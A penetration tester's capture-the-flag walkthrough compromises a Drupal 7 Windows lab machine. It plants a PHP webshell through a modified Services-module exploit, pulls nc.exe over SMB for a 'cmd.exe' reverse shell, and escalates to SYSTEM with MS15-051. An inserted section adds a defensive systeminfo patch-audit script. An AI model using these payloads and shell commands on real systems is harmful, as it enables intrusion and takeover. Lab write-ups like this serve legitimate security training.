Machine IP —


80/tcp open http Microsoft IIS httpd 7.5
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

After enumerating for a while, I see that Drupal 7 is running on port 80, so let's search for a vulnerability that can lead us to a shell or information.

Let's scan Drupal with droopescan

┌─[root@PREDATOR]─[~] droopescan scan drupal -u
[+] Themes found:

[+] Possible interesting urls found:
Default changelog file -
Default admin -

[+] Possible version(s):

[+] Plugins found:

[+] Scan finished (0:40:53.627982 elapsed)

Using dirsearch

When we visit we get to see that

Services Endpoint "rest_endpoint" has been setup successfully.

Now search for an exploit for Drupal 7

Here 41564.php looks useful, but we are going to modify the script

$url = '';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';
$file = [
'filename' => 'dixuSOspsOUU.php',
'data' => '<?php echo system($_GET["cmd"]); ?>'
];

So now let’s use this script

└──╼ #php 41564.php
# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Vendor Homepage:
# Exploit Author: Charles FOL
# Contact:
# Website:
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
File written:

This writes a PHP file to the server, and from there we can run commands using [ ?cmd=] in the URL. First we send nc.exe to the target so that we can get a reverse shell from it. I used the steps below to copy nc.exe to the server:

* Start an SMB share on the local system using and keep nc.exe in the directory you are starting the SMB share raj from.
* Now call nc.exe from the web to fetch it using http:// \\\raj\nc.exe nc.exe

Now that we have nc.exe, let's call for a shell 443 -e cmd.exe

And start your nc listener on port 443

nc -lvp 443

Here we get a shell as the nt authority\iusr user, and now we can access user.txt

C:\Users\dimitris\Desktop>type user.txt
type user.txt

Now let's begin privilege escalation to get a SYSTEM shell. I used [] to find a Windows exploit that can help with privilege escalation to SYSTEM.

I used systeminfo and got a hint pointing to a kernel exploit


Host Name: BASTARD
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00496-001-0001283-84782
Original Install Date: 18/3/2017, 7:04:46
System Boot Time: 28/9/2019, 10:49:30
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2.047 MB
Available Physical Memory: 1.525 MB
Virtual Memory: Max Size: 4.095 MB
Virtual Memory: Available: 3.534 MB
Virtual Memory: In Use: 561 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
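
An added example (not part of the original write-up or of any tool it uses): the fields that stand out in this output are the N/A service pack on build 7600 and Hotfix(s): N/A, and a defender can flag the same condition across an inventory by parsing saved systeminfo output. The host EXAMPLE-SRV and the KB ids are constructed placeholders, and the function names are hypothetical.

```python
import re

# Constructed sample: trimmed systeminfo output with the field values shown above.
UNPATCHED = """\
Host Name: BASTARD
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
"""

# Constructed sample of a patched host; host name and KB ids are placeholders.
PATCHED = """\
Host Name: EXAMPLE-SRV
OS Version: 6.1.7601 Service Pack 1 Build 7601
Hotfix(s): 2 Hotfix(s) Installed.
           [01]: KB0000001
           [02]: KB0000002
Network Card(s): 1 NIC(s) Installed.
"""

def parse_systeminfo(text):
    """Return (fields, hotfixes): top-level 'Name: value' pairs and installed KB ids."""
    fields, hotfixes, current = {}, [], None
    for line in text.splitlines():
        m = re.match(r"([A-Za-z][^:]*):\s*(.*)$", line)
        if m:                                  # unindented "Name: value" line
            current = m.group(1).strip()
            fields[current] = m.group(2).strip()
        elif current == "Hotfix(s)":           # indented "[01]: KB..." entries
            hotfixes += re.findall(r"KB\d+", line)
    return fields, hotfixes

def audit(text, required_kbs=()):
    """Return (host, findings) describing patch-hygiene gaps for one host."""
    fields, hotfixes = parse_systeminfo(text)
    findings = []
    version = fields.get("OS Version", "")
    # systeminfo prints "<version> <service pack> Build <n>"; N/A means no service pack.
    if "N/A" in version.split("Build")[0]:
        findings.append("no service pack installed")
    if not hotfixes:
        findings.append("no hotfixes listed")
    findings += [f"missing {kb}" for kb in required_kbs if kb not in hotfixes]
    return fields.get("Host Name", "?"), findings

if __name__ == "__main__":
    for sample in (UNPATCHED, PATCHED):
        print(audit(sample, required_kbs=["KB0000002", "KB0000003"]))
```

Pass the KB ids from the relevant security bulletins as required_kbs to turn this into a per-bulletin check.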

I had also enumerated some previous machines, and from them I found it common to use MS15-051; you can get it here

I copied ms15-051 to the target using the SMB server, in the same way we copied nc.exe to the target, using

copy \\\raj\ms15-051.exe ms15-051.exe

C:\inetpub\drupal-7.54>ms15-051.exe "whoami"
ms15-051.exe "whoami"
[#] ms15-051 fixed by zcgonvh
[!] process with pid: 1836 created.
nt authority\system

Yup, here we can see that instead of nc we can also use nc.exe and get a reverse shell as system, so let's try it

Let's listen for it with nc

Done, we got system 😌

Security Researcher, Penetration Tester